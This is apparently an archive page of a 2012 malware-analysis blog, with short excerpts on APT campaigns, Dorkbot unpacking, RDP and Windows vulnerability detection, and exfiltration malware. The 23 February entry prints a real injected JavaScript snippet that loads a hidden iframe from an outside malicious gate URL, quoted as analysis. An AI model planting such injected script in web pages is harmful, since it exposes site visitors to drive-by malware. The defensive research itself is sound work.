30 Mar 2012 | Author: Abhijeet |
The Trend Micro blog published a paper titled Luckycat Redux, which looked into the activities of the Luckycat APT campaign. According to the report, the Luckycat campaign targeted a diverse set of industries, including aerospace, shipping, energy, military and engineering, as well as Tibetan activists, using a variety of malware. Trend Micro was able to trace the sources of the attack back to China. Below [...]
24 Mar 2012 | Author: Abhijeet |
Yesterday I encountered another sample (SHA1: e3a7a9c9a5fcdc0b4bd6ffd9a5b83ba7a22353af) of Dorkbot while analyzing my honeypot. Knowing that most Dorkbot samples are packed with UPX, I used the upx tool to unpack the binary. However, just to recall my manual steps for unpacking binaries, I thought of writing this post. Let's use the PEiD tool to verify if [...]
19 Mar 2012 | Author: Abhijeet |
The signature specified in the previous entry was for detecting the RCE/DoS attempt within the TargetParams structure of the RDP protocol. However, a DoS PoC listed here exploits another structure, MaxParam, from the same RDP protocol. The PoC was developed by jduck (Joshua J. Drake) of Accuvant and sets the value of the first parameter, maxChannelIds, to 4294967295. This value is causing [...]
17 Mar 2012 | Author: Abhijeet |
The release of exploit PoC code for CVE-2012-0002 by the finder himself has definitely increased the chances of exploitation of this vulnerability. Microsoft has released a patch to address the vulnerability. However, considering the patch deployment life cycle and ongoing exploit attempts, we need to be proactive in detecting and blocking all the attempts of [...]
6 Mar 2012 | Author: Abhijeet |
The Contagiodump blog published an analysis of a targeted attack using the new CVE-2012-0754 exploit. The post walks through the whole exploit attempt and gives great detail on the exploit and payload analysis. I will not repeat the analysis in this post but will discuss the key points. I liked the adjacent picture posted on the contagio blog so [...]
23 Feb 2012 | Author: Abhijeet |
Today, while browsing for some information, I ended up landing on the website below. I happened to have my Fiddler instance open and saw an embedded iframe in the website. Here is the snippet of the injected iframe.
window.setTimeout(function(){ var JSinj=document.createElement('iframe'); JSinj.src='http://unclesammm.com/gate.php?f=873110&r='+escape(document.referrer||''); JSinj.width='0'; JSinj.height='0'; JSinj.frameborder='0'; JSinj.marginheight='0'; JSinj.marginwidth='0'; JSinj.border='0'; try{ document.body.appendChild(JSinj); }catch(e){ document.documentElement.appendChild(JSinj);
The iframe took me to [...]
11 Feb 2012 | Author: Abhijeet |
Recently, a piece of malware was seen in the wild which grabbed Microsoft Word and Excel files present on the infected system and uploaded them to the free file sharing website sendspace.com. File sharing websites were previously, and are still, involved in malware drive-by attempts, but using them as a data exfiltration channel was seen for [...]
3 Feb 2012 | Author: Abhijeet |
Background: On 31st January 2012, Zscaler and Seculert posted analyses of a recently identified RAT malware which is believed to be used in government-related targeted attacks. Both of these firms identified command and control beacon patterns and independently published them on their respective websites. As with all APT attacks, these C&C patterns were built [...]
30 Jan 2012 | Author: Abhijeet |
The very first exploit for MS12-004 was seen in the wild last Friday. As soon as the exploit attempt was discovered, researchers were quick to post their analysis of the vulnerability. A Metasploit module was also made available to the public in its latest revision, 14640. In this post I will share a [...]
29 Jan 2012 | Author: Abhijeet |
As ever, the opinions expressed on this website are personal to me and do not necessarily reflect the opinions of my employer. As part of January's Patch Tuesday, we released 7 patches targeting 8 individual vulnerabilities. Out of these 8 vulnerabilities, I will talk about CVE-2012-0003, a memory corruption vulnerability in the Windows Media component that [...]